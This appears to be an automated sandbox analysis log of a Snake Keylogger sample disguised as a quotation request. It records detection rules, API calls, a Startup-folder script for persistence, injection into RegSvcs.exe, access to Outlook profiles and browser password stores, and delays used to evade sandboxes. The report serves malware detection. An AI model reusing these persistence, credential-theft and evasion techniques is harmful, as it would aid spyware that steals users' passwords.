Source: Process Memory Space: ageless.exe PID: 7768, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7804, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: ageless.exe PID: 7440, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/3@4/4
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F837B5 GetLastError,FormatMessageW, 1_2_00F837B5
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F710BF AdjustTokenPrivileges,CloseHandle, 1_2_00F710BF
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 1_2_00F716C3
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00DC10BF AdjustTokenPrivileges,CloseHandle, 2_2_00DC10BF
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00DC16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 2_2_00DC16C3
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F851CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 1_2_00F851CD
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F9A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 1_2_00F9A67C
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F8648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, 1_2_00F8648E
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 1_2_00F142A2
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | File created: C:\Users\user\AppData\Local\supergroup
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | File created: C:\Users\user\AppData\Local\Temp\zZt
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs"
Source: QUOTATION REQUIRED_Enatel s.r.l..exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RegSvcs.exe, 00000003.00000002.2611160055.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: QUOTATION REQUIRED_Enatel s.r.l..exe | ReversingLabs: Detection: 39%
Source: QUOTATION REQUIRED_Enatel s.r.l..exe | Virustotal: Detection: 34%
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | File read: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe
Source: unknown | Process created: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe"
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Process created: C:\Users\user\AppData\Local\supergroup\ageless.exe "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe"
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\supergroup\ageless.exe "C:\Users\user\AppData\Local\supergroup\ageless.exe"
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\supergroup\ageless.exe"
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: QUOTATION REQUIRED_Enatel s.r.l..exe | Static file information: File size 1586688 > 1048576
Source: QUOTATION REQUIRED_Enatel s.r.l..exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: QUOTATION REQUIRED_Enatel s.r.l..exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: QUOTATION REQUIRED_Enatel s.r.l..exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: QUOTATION REQUIRED_Enatel s.r.l..exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: QUOTATION REQUIRED_Enatel s.r.l..exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: QUOTATION REQUIRED_Enatel s.r.l..exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: QUOTATION REQUIRED_Enatel s.r.l..exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: vC:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 00000009.00000002.2619835798.00000000061F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.2619695946.0000000005DF6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbH= source: RegSvcs.exe, 00000003.00000002.2619695946.0000000005DA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000003.00000002.2619695946.0000000005DA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: ageless.exe, 00000002.00000003.1378208824.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000002.00000003.1379203618.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000008.00000003.1566943933.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000008.00000003.1570215847.0000000003C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ageless.exe, 00000002.00000003.1378208824.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000002.00000003.1379203618.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000008.00000003.1566943933.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000008.00000003.1570215847.0000000003C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.2619695946.0000000005DA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 2/oC:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000009.00000002.2619835798.00000000061F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vws\dll\mscorlib.pdb source: RegSvcs.exe, 00000009.00000002.2619835798.00000000061F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.2619695946.0000000005DA0000.00000004.00000020.00020000.00000000.sdmp
Source: QUOTATION REQUIRED_Enatel s.r.l..exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: QUOTATION REQUIRED_Enatel s.r.l..exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: QUOTATION REQUIRED_Enatel s.r.l..exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: QUOTATION REQUIRED_Enatel s.r.l..exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: QUOTATION REQUIRED_Enatel s.r.l..exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 1_2_00F142DE
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F30A76 push ecx; ret 1_2_00F30A89
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D80A76 push ecx; ret 2_2_00D80A89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00C29C30 push esp; retf 00C4h 3_2_00C29D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_02A3891E pushad ; iretd 9_2_02A3891F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_02A38C2F pushfd ; iretd 9_2_02A38C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_02A38DDF push esp; iretd 9_2_02A38DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06B561DD pushad ; ret 9_2_06B561DE
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | File created: C:\Users\user\AppData\Local\supergroup\ageless.exe

Boot Survival

Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00F2F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 1_2_00F2F98E
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: 1_2_00FA1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 1_2_00FA1C41
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00D7F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 2_2_00D7F98E
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 2_2_00DF1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 2_2_00DF1C41
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exe API/Special instruction interceptor: Address: 140CFA4
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exe API/Special instruction interceptor: Address: 134B25C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599891
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599558
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599437
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599219
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598891
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598766
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598422
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598313
